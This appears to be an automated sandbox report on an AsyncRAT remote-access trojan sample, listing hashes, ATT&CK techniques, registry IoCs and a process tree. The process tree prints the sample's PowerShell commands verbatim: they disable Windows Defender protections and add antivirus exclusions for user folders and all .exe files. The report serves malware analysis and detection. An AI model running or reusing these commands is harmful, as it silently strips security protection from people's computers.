asyncrat | fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7

General

Target

fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Size

405KB
MD5

c4e10100c5cf7bec2d9d0a1d7203ddb2
SHA1

24a6ecd52fb2165b8563a2853898316851638871
SHA256

fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7
SHA512

ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202
SSDEEP

6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD

Score

10^/10

asyncrat execution persistence rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
276	powershell.exe
1568	powershell.exe
2736	powershell.exe
2680	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\JkanJjJrabo = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command\	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
2856	powershell.exe
2608	powershell.exe
2736	powershell.exe
276	powershell.exe
1568	powershell.exe
2680	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	276	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1904 wrote to memory of 2980	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe	28
PID 1904 wrote to memory of 2980	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe	28
PID 1904 wrote to memory of 2980	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe	28
PID 1904 wrote to memory of 2560	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe	30
PID 1904 wrote to memory of 2560	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe	30
PID 1904 wrote to memory of 2560	1904	fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe	30
PID 2980 wrote to memory of 2736	2980	cmd.exe	32
PID 2980 wrote to memory of 2736	2980	cmd.exe	32
PID 2980 wrote to memory of 2736	2980	cmd.exe	32
PID 2560 wrote to memory of 2856	2560	cmd.exe	33
PID 2560 wrote to memory of 2856	2560	cmd.exe	33
PID 2560 wrote to memory of 2856	2560	cmd.exe	33
PID 2560 wrote to memory of 2608	2560	cmd.exe	34
PID 2560 wrote to memory of 2608	2560	cmd.exe	34
PID 2560 wrote to memory of 2608	2560	cmd.exe	34
PID 2560 wrote to memory of 276	2560	cmd.exe	35
PID 2560 wrote to memory of 276	2560	cmd.exe	35
PID 2560 wrote to memory of 276	2560	cmd.exe	35
PID 2560 wrote to memory of 1568	2560	cmd.exe	36
PID 2560 wrote to memory of 1568	2560	cmd.exe	36
PID 2560 wrote to memory of 1568	2560	cmd.exe	36
PID 2560 wrote to memory of 2680	2560	cmd.exe	37
PID 2560 wrote to memory of 2680	2560	cmd.exe	37
PID 2560 wrote to memory of 2680	2560	cmd.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
"C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"
1⤵
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7cedbe448585e24df571f62dad6af14e

SHA1
b4fbb0810daa982975c72b2962086a7ce8870f84

SHA256
990495ff8e54a2865c814770ed0313879fa08db7388f245273490e71f2be35f0

SHA512
89c9f203e193a66b13936207fb47d2587e3f9b223c987801e720d014131fe03c340b698761bee9a53db3be8ffb8a1858eea5816f9a1bedb7e5320c450532e23f

Download Submit
memory/1568-30-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/1568-31-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/1904-0-0x000007FEF52F3000-0x000007FEF52F4000-memory.dmp

Filesize
4KB

Download
memory/1904-1-0x0000000000C50000-0x0000000000CBC000-memory.dmp

Filesize
432KB

Download
memory/1904-2-0x000007FEF52F0000-0x000007FEF5CDC000-memory.dmp

Filesize
9.9MB

Download
memory/1904-38-0x000007FEF52F3000-0x000007FEF52F4000-memory.dmp

Filesize
4KB

Download
memory/1904-39-0x000007FEF52F0000-0x000007FEF5CDC000-memory.dmp

Filesize
9.9MB

Download
memory/2608-17-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2856-18-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads